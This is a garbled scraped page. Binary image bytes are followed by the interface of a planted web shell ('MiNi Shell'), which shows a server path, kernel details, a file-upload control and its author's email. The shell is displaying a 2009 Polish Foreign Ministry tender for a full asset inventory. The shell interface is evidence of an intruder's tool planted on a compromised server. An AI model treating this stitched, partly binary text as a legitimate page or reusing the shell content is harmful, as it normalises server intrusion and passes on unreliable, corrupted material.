JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20091020/366784-N-2009.html

<p class="kh_header"><b>Warszawa: WYKONANIE PEŁNEJ INWENTARYZACJI - SPISU Z NATURY SKŁADNIKÓW MAJĄTKU ZARZĄDU OBSŁUGI MINISTERSTWA SPRAW ZAGRANICZNYCH</b><br>
<b>Numer ogłoszenia: 366784 - 2009; data zamieszczenia: 20.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE PEŁNEJ INWENTARYZACJI - SPISU Z NATURY SKŁADNIKÓW MAJĄTKU ZARZĄDU OBSŁUGI MINISTERSTWA SPRAW ZAGRANICZNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SPECYFIKACJA DOTYCZĄCA PEŁNEJ  INWENTARYZACJI SKŁADNIKÓW MAJĄTKOWYCH MSZ - SPIS Z NATURY
1. Celem projektu jest wykonanie pełnej inwentaryzacji składników majątkowych MSZ.
2. Poprzez wykonanie pełnej inwentaryzacji składników majątkowych MSZ Zamawiający rozumie wykonanie spisu z natury wszystkich środków będących w dyspozycji i użytkowaniu MSZ we wszystkich obiektach MSZ na terenie RP oraz ich rozliczenie, czyli porównanie z zaewidencjonowanymi składnikami majątku otrzymanymi z Samodzielnej Sekcji Ewidencji Majątku Zarządu Obsługi MSZ w wersji elektronicznej.
3.Inwentaryzacja będzie wykonywana drogą spisu z natury oraz drogą fizycznego potwierdzenia dla przedmiotów będących w użytkowaniu pracowników i miejsc niedostępnych w dniu spisu.
4. Spis z natury będzie przeprowadzony według stanu na oznaczony dzień.
5. Spisowi podlegają wszystkie składniki majątku, również te do których dostęp jest z różnych przyczyn utrudniony w chwili przeprowadzenia spisu z natury w danym obiekcie (pomieszczeniu) np.: w szafach, kontenerach, pomieszczeniach tajnych, a udostępnianych przez pracowników.
6. Po przeprowadzeniu pełnego spisu i jego rozliczeniu zostaną wykonane raporty dotyczące środków spisanych, nadwyżek i niedoborów oraz różnic inwentaryzacyjnych składników majątku we wszystkich obiektach z uwzględnieniem poszczególnych lokalizacji jednostek organizacyjnych MSZ.
7. Spis z natury składników majątku będzie obejmował obiekty MSZ znajdujące się w Warszawie, tj.:
7.1	budynek główny MSZ al. .Szucha 23,
7.2	pomieszczenia MSZ al. Szucha 16,
7.3	budynek biurowo-garażowy MSZ al. Szucha 23a, 
7.4	budynek Articom MSZ al. Szucha 21,
7.5	magazyny centralne MSZ ul. Taneczna 73, 
7.6	obiekty MSZ ul. Taneczna 67a,
7.7	obiekty MSZ ul. Karmazynowa 1,
7.8	pałacyk MSZ ul. Foksal 6
8. Ilość środków podlegających inwentaryzacji to około 70 000 tys. rekordów (ilości sztuk) ewidencji oraz składniki majątku nie objęte ewidencją (wg ich stanu faktycznego).
9.Inwentaryzacja - spis z natury odbywać się będzie od dnia podpisania umowy, jednak nie później niż do dnia 20.01.2010r.; 
10. Przygotowanie nowej bazy danych potrzebnej do zaimportowania jej do programu Symfonia określa się nie później niż do dnia do dnia 05.03.2010r.;
11. Wykonawca zobowiązany jest do przedstawienia harmonogramu z określeniem   czynności przygotowania, spisu i rozliczenia inwentaryzacji - przy podpisaniu umowy;
12. Wykonawca zobowiązany jest do opracowania instrukcji inwentaryzacyjnej dla realizacji inwentaryzacji przeprowadzonej przez Wykonawcę, uzgodnionej i zaakceptowanej przez Zamawiającego (uwzględniającej jego specyfikę)- przy podpisaniu umowy;
13. Wykonawca zobowiązany jest do opracowania koncepcji realizacji spisu z natury (metoda spisu) - przy podpisaniu umowy;
14.Ilość zespołów spisowych jaką Zamawiający wymaga do przeprowadzenia inwentaryzacji -  min. 15 zespołów, po min. 2 osoby w zespole, w pełni przeszkolonych i zaakceptowanych przez ZO MSZ w zakresie przeprowadzenia inwentaryzacji.
15. Zamawiający przewiduje godziny pracy zespołów spisowych od godz.8:30 do godz.16:00 w dni robocze.
16. Zamawiający wymaga prawidłowości w obiegu dokumentów inwentaryzacyjnych (kompletowanie i zabezpieczenie dokumentacji).
17. Zamawiający wymaga czytelnego prowadzenia arkuszy spisowych, tj.: dokładnych  opisów, czytelnych numerów inwentaryzacyjnych, bez poprawek, a ewentualne skreślenia mogą być dokonywane tylko zgodnie z procedurą (na arkuszu z podpisami całego składu zespołu spisowego).
18. Zamawiający wymaga, aby w arkuszu spisowym ująć miejsca znajdowania się przedmiotu spisywanego (adres, numer pomieszczenia) w formie elektronicznej i papierowej.
19. Zamawiający wymaga,  aby Wykonawca wydrukował wypełnione karty inwentarzowe we wszystkich pomieszczeniach MSZ.
20. Zamawiający wymaga, aby przy spisie Wykonawca dokonał podziału na środki niskocenne, wyposażenie i środki trwałe.
21.Po zakończeniu spisu Wykonawca powinien uzgodnić stan spisu z natury składników majątku z działem ewidencyjnym (rozliczenie spisu to porównanie przekazanych danych z ewidencji MSZ z wykonanym przez firmę spisem z natury metodą elektroniczną. W wyniku porównania powstaną raporty dotyczące składników majątkowych).
22. Zamawiający wymaga, aby sporządzane raporty inwentaryzacyjne dla wszystkich składników majątku, zawierały dane ilościowo- wartościowe:
-  nadwyżek
-  raport niedoborów
-  raport uszkodzonych składników majątku 
23. Zamawiający wymaga, aby Wykonawca dokonał kompensacji nadwyżek z niedoborami za zgodą wyznaczonych przedstawicieli Zamawiającego (wspólne przeanalizowanie danych i raportów elektronicznych uzyskanych ze spisu, dostosowanie nazewnictwa stosowanego podczas spisu do nazewnictwa przyjętego w ewidencji majątkowej MSZ na etapie przygotowania).
24. Zamawiający wymaga, aby Wykonawca na piśmie przedstawił sprawozdanie końcowe.
25. Zamawiający wymaga aby ze strony Wykonawcy prowadzony był ciągły nadzór nad zespołami spisowymi i weryfikacja ich pracy - potwierdzanie zgodności spisów.
26.Zamawiający zastrzega sobie możliwość nadzoru nad przebiegiem inwentaryzacji.
27. Zamawiający wymaga, aby Wykonawca stworzył bazę danych na podstawie spisu z natury potrzebną do zaimportowania jej do programu księgowego Symfonia w Dziale Księgowości ZO MSZ.
28.Zamawiający wymaga, aby Wykonawca oznakował (okleił) nowymi etykietami z kodem kreskowym wszystkie składniki majątku.
29.Zamawiający wymaga, aby etykiety z kodami kreskowymi były foliowe z nadrukiem termotransferowym żywicznym o wymiarach 50x25mm.
30. Zamawiający wymaga, aby dokumentacja była sporządzona i zapisana w wersji elektronicznej na płycie CD w formacie MS Word, PDF oraz Exel.
31. Wykonawca zobowiązuje się wykonać przedmiot umowy samodzielnie.
32. Powierzenie wykonania całości lub części przedmiotu umowy osobom trzecim wymaga uprzedniej pisemnej zgody Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 22.13.00.00-0, 72.32.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 7 000,00 PLN (słownie: siedem tysięcy PLN)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Opis warunków udziału w postępowaniu: 
1.1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ustawy Prawo zamówień publicznych, tzn:
a)	  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	   posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r. -Prawo zamówień publicznych ( Dz. U. z 2007r. nr 223 poz. 1655 z późniejszymi zmianami);
a także:
1.2 Wykażą się odpowiednim doświadczeniem, tj. zrealizowali (wykonali, zakończyli) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności  jest krótszy- w tym okresie co najmniej trzy usługi odpowiadające swoim rodzajem i wartością (minimum 200 000,00 zł brutto każda) usługom stanowiącym przedmiot zamówienia. Za usługi odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia Zamawiający uzna usługi wykonania inwentaryzacji - spisu z natury - minimum 50 000 rekordów;
1.3 posiadają certyfikat/licencję wydane przez Ministra Finansów w zakresie usługowego prowadzenia ksiąg rachunkowych na podstawie ustawy z dnia 19 września 2002 roku o rachunkowości (Dz.U. z 2002r. Nr 76, poz. 694 z póź. zmian.) i Rozporządzenia Ministra Finansów z dnia 18 lipca 2002r, w sprawie uprawnień do usługowego prowadzenia ksiąg rachunkowych (Dz. U. z dnia 29 lipca 2002r.); 
         Za certyfikat Zamawiający uzna certyfikat księgowy wystawiony przez Ministra właściwego do spraw finansów publicznych, a za licencję Zamawiający uzna wpis do rejestru biegłych rewidentów lub wpis  na listę doradców podatkowych;

2.  Sposób dokonywania oceny spełniania warunków udziału w postępowaniu:
2.1.	Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. SIWZ
2.2.	W przypadku oferty składanej wspólnie przez kilku Wykonawców ubiegających się o udzielenie zamówienia, ocena wymagań określonych w pkt 5.1.2 5.1.3. siwz, będzie dokonana łącznie w stosunku do Wykonawców ubiegających się wspólnie o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 
potwierdzenia spełniania warunków udziału w postępowaniu: 
1.1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, określonych w  pkt.5.1. Wykonawcy muszą przedstawić następujące dokumenty:
a)	Wypełnione Oświadczenie o spełnianiu warunków z art. 22 ust.1 pkt. 1-3 ustawy  Prawo zamówień publicznych- (Załącznik nr 2 do SIWZ);
b)	Wypełnione Oświadczenie  o nie podleganiu wykluczeniu z postępowania na podst. Art. 22 ust 1 pkt 4 w związku z  art. 24  ustawy  Prawo zamówień publicznych- (Załącznik nr 3 do SIWZ);
c)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
d)	Certyfikat/licencję wydane przez Ministra Finansów w zakresie usługowego prowadzenia ksiąg rachunkowych na podstawie ustawy z dnia 19 września 2002 roku o rachunkowości (Dz.U. z 2002r. Nr 76, poz. 694) i Rozporządzenia Ministra Finansów z dnia 18 lipca 2002r, w sprawie uprawnień do usługowego prowadzenia ksiąg rachunkowych (Dz. U. z dnia 29 lipca 2002r.);
e)	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz             właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca  nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,  lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Zaświadczenia  muszą być wystawione nie wcześniej niż  3 miesiące przed upływem  terminu składania ofert;
f)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 4 - 8 ustawy Prawo zamówień publicznych - wystawione  nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert;    
g)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24            ust.1 pkt. 9 ustawy Prawo zamówień publicznych - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
h)	Oświadczenie o liczbie osób i podmiotów które będą uczestniczyć w wykonywaniu przedmiotu zamówienia (liczba osób przewidzianych do wykonania usługi inwentaryzacji musi być zgodna z liczbą osób, jaka będzie brana pod uwagę w kryterium III przy ocenie ofert - patrz pkt. 13 SIWZ). - Załącznik nr 7 do SIWZ. Natomiast WYKAZ osób i podmiotów (imię, nazwisko, nr pesel), które będą uczestniczyć w wykonywaniu przedmiotu zamówienia (liczba osób przewidzianych do wykonania usługi inwentaryzacji musi być zgodna z liczbą osób, jaka będzie brana pod uwagę w kryterium III przy ocenie ofert - patrz pkt. 13 SIWZ) Wykonawca musi dostarczyć Zamawiającemu przed podpisaniem umowy.  Wykaz należy sporządzić zgodnie z załączonym wzorem - załącznik nr 7a do SIWZ - (patrz pkt 14 SIWZ).
i)	Wykaz wykonanych usług inwentaryzacyjnych, w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, potwierdzający, że Wykonawcy należycie zrealizowali (wykonali, zakończyli) co najmniej trzy usługi odpowiadające swoim rodzajem i wartością (minimum 200 000,00 zł brutto każda) przedmiotowi zamówienia. Za usługi odpowiadające swoim rodzajem i wartością przedmiotowi zamówienia Zamawiający uzna usługi wykonania inwentaryzacji - spisu z natury - minimum 50 000 rekordów. Wykaz należy sporządzić zgodnie z załączonym wzorem - załącznik nr 6 do SIWZ.
j)	Do wykazu wykonanych usług należy dołączyć dokumenty wydane przez zleceniodawców potwierdzające, że usługi określone w pkt. 6.1.1 lit. i) siwz zostały wykonane  należycie.

Dokumenty wyszczególnione w lit. c), d), e), f), g), j) muszą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem (każda strona) - przez Wykonawcę.
Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu (np. jeśli przedstawiona kserokopia będzie nieczytelna lub będzie wzbudzać wątpliwości co do jej prawdziwości). 
Pozostałe wymagane dokumenty muszą być przestawione w formie oryginału. 

Treść oferty musi odpowiadać treści SIWZ.


2.  Ponadto w ofercie należy przedstawić również nw. dokumenty i oświadczenia:
2.1	Wypełniony formularz oferty, dokładny adres wykonawcy, (wypełnione wszystkie pozycje poszczególnych rubryk)- (Załącznik nr 1);
2.2	Pełnomocnictwo do występowania w imieniu Wykonawcy i zaciągania w jego imieniu zobowiązań - (Załącznik nr 4) - wzór do ewentualnego wykorzystania;

Pełnomocnictwo do występowania w imieniu wykonawcy musi być załączone w oryginale albo załączone jako kopia pełnomocnictwa uwierzytelniona notarialnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Czas realizacji całości przedmiotu zamówienia - 20</li>
<li>3 - Ilość osób biorących czynny udział w spisie - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.msz.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych 
00-580 Warszawa 
Al. J.Ch. Szucha 23.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2009 godzina 11:00, miejsce: Dziennik Podawczy MSZ
	  00-580 Warszawa 
        Al. J.Ch. Szucha 23.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com